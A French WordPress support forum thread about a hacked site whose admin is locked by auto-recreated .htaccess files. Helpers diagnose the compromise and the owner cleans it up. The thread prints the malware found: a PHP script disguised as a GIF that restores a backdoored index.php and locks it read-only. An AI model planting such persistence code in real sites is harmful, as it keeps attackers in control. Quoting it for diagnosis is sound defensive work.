[Résolu] fichier htaccess qui se crée automatiquement et m’amène à une erreur 403 (Créer un compte)

  • WordPress :6.3
  • Statut : résolu
8 sujets de 1 à 8 (sur un total de 8)
  • Auteur
    Messages
  • #2462561
    RachPat
    Participant
    Initié WordPress
    29 contributions

    Bonjour,

    Ma configuration WP actuelle

    • Version de PHP/MySQL : 7.4.33 (Supporte les valeurs 64 bits)
    • Thème utilisé : Neve 3.7.2
    • Extensions en place :
      • Age Gate Version 3.2.0 par Phil Baker
      • Classic Widgets Version 0.3 par WordPress Contributors
      • Content Views Version 3.5.0 par Content Views
      • Duplicate Page Version 4.5.3 par mndpsingh287
      • Easy Google Fonts Version 2.0.4 par Titanium Themes
      • Elementor Version 3.16.5 par Elementor.com (dernière version : 3.17.1)
      • Elementor Pro Version 3.16.2 par Elementor.com (dernière version : 3.17.0)
      • Essential Addons for Elementor Version 5.8.11 par WPDeveloper (dernière version : 5.8.13)
      • Feed Them Social – Page, Post, Video and Photo Galleries Version 4.1.8 par SlickRemix
      • Image Hover Effects – Elementor Addon Version 1.4 par Blocksera
      • Neve Pro Addon Version 2.7.1 par ThemeIsle
      • Otter Pro Version 2.4.0 par ThemeIsle
      • Otter – Page Builder Blocks & Extensions for Gutenberg Version 2.4.0 par ThemeIsle
      • ReCaptcha v2 for Contact Form 7 Version 1.4.4 par IQComputing
      • Simplicy SEO Version 1.0.4 par Fred
      • Templates Patterns Collection Version 1.2.3 par ThemeIsle
      • Timeline Widget For Elementor Version 1.5.1 par Cool Plugins
      • Use Any Font Version 6.3.04 par Dnesscarkey
      • WP Fastest Cache Version 1.2.0 par Emre Vona | Mises à jour auto désactivées
      • WP Go Maps (formerly WP Google Maps) Version 9.0.27 par WP Go Maps (formerly WP Google Maps)
      • WP Statistics Version 14.2 par VeronaLabs
    • Nom de l’hébergeur : OVH
    • Adresse du site : https://www.brasseriedupilat.com

    Problème(s) rencontré(s) :

    Bonjour, depuis plusieurs jours, impossible d’accéder à aucun plugin ni même aux médias dans le back-office de mon site wordpress. Le site fonctionne en façade mais pas en admin… Et comme les pages sont composées dans Elementor je ne peux même plus faire une modification sur une page…

    J’ai repéré que bizarrement un fichier htaccess était présent dans chacun des dossiers du site… Via le ftp, j’ai réinstallé tous les dossiers d’origine de wordpress mis à part le fichier wp-content.php et le contenu du dossier wp-content. Alors dans chaque dossier un fichier htaccess se recrée automatiquement, avec le contenu suivant :

    <FilesMatch « .(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$ »>
    Order allow,deny
    Deny from all
    </FilesMatch>

    Donc j’imagine que le problème vient de là… Savez-vous s’il s’agit d’un piratage et s’il y a un fichier à détecter et supprimer pour sauver mon site ?

    Merci d’avance de votre aide !

    #2462563
    ferman
    Participant
    Maître WordPress
    6994 contributions

    Bonjour

    Savez-vous s’il s’agit d’un piratage. Oui, malheureusement, mais c’est réparable avec un peu d’huile de coude . Il faut suivre complètement ce tuto. Bon courage .

    Il semble que vous n’ayez pas de plugin de sécurité. Une fois le site réparé, il serait bon d’en mettre un.

     

     

     

    • Cette réponse a été modifiée le il y a 7 mois et 2 semaines par ferman.
    #2462568
    RachPat
    Participant
    Initié WordPress
    29 contributions

    Merci beaucoup pour cette réponse et ce tuto… bien fastidieux en effet mais c’est super d’avoir cette route… à suivre !

    Pour info, j’ai détecté un drôle de fichier « soi-disant gif » dans le wp-include (en faisant des comparaisons avec le wp-include de base de wp) :

    il s’agit du fichier wp-includes > images > 1eCOxV.gif

    et quand on l’ouvre il dit :

    <?php
    $in = « /home/brasseriip/www/index.php »;
    $bkin = « /home/brasseriip/www/wp-includes/images/Ty2Kzn.htm »;
    if($in && file_exists($bkin)){
    if(!file_exists($in) or (filesize($in) != filesize($bkin))){
    @chmod($in,0644);
    @file_put_contents($in,file_get_contents($bkin));
    @chmod($in,0444);
    }
    }
    ?>

    Si vous comprenez le code, pensez-vous que ça fasse partie de la clé du piratage ?

    Merci de votre intérêt pour la question et bonne fin de journée

     

    #2462572
    ferman
    Participant
    Maître WordPress
    6994 contributions

    Sans être expert, je pense à peu près comprendre ce que fait le code que vous montrez. En résumé:

    Le fichier « Ty2Kzn.htm » contenu dans le dossier wp-includes/images (vous le voyez?) est ajouté dans le fichier index.php (vous devez l’y voir également). Ensuite les droits de index.php sont passés en mod 444 (lecture seule) de façon à ce qu’il ne puisse plus être modifié . Cela fait forcément partie du piratage. Tout cela sera nettoyé en suivant le tuto.

    Si des htaccess sont recréés alors que vous avez remplacé tous les dossiers sauf wp-content, c’est que du code malicieux se trouve dans ce dossier: un plugin, un thème (les supprimer/réinstaller; voir tuto), le fichier upload (que bien sûr vous ne pouvez pas remplacer); il faut soigneusement vérifier son contenu. Il ne doit pas y avoir de fichier anormal, par exemple php) et/ou dans un autre fichier que vous n’auriez pas remplacé (vérifiez en particulier wp-config;  y a-t-il des lignes bizarres au début ou à la fin ).

     

     

    #2462576
    RachPat
    Participant
    Initié WordPress
    29 contributions

    Merci beaucoup pour ces précisio. En effet, le fichier Ty2Kzn.htm était présent dans le wp-includes infecté, ainsi que le fichier index.php.
    Quant au fichier wp-config, celui-là n’avait pas d’anomalie…

    J’ai pu remettre en route le site en faisant attention à chaque dossier de wp-content que je réimportais, et bonheur, les fichiers htaccess ne se sont pas re-créés… Ouf ! J’ai aussi changé le mot de passe d’accès au site…

    Suite à beaucoup de farfouillages sur le net, j’hésite à rajouter dans le .htaccess le code :

    <Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
    </Files>

    Si vous avez un avis là-dessus ?
    En tout cas, merci, après un sacré paquet d’heures de recherche j’ai retrouvé mon admin !

    Très bonne soirée !

     

    #2462577
    Li-An
    Participant
    Maître WordPress
    28491 contributions

    Bonjour, pensez à installer surtout une vraie extension de sécurité. Les extensions de sécurité que je conseille : Ninja Firewall (léger sur le site), SecuPress (français) et Wordfence (la plus populaire) cf mon billet https://www.echodesplugins.li-an.fr/plugins/un-wordpress-vraiment-protege/.

    #2462579
    ferman
    Participant
    Maître WordPress
    6994 contributions

    <Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
    </Files>

    Si vous n’utilisez pas Jetpack ou ne travaillez pas sur votre site à partir d’un mobile il est bon d’inactiver xmlrpc. Cependant vous n’avez pas à mettre de code dans htaccess; tous les bons plugins de sécurité ont cette option (parmi bien d’autres tout aussi utiles).

    #2462586
    RachPat
    Participant
    Initié WordPress
    29 contributions

    Merci beaucoup pour ces conseils et merci vraiment à ce forum d’exister, c’est toujours une mine d’informations !

8 sujets de 1 à 8 (sur un total de 8)
  • Vous devez être connecté pour répondre à ce sujet.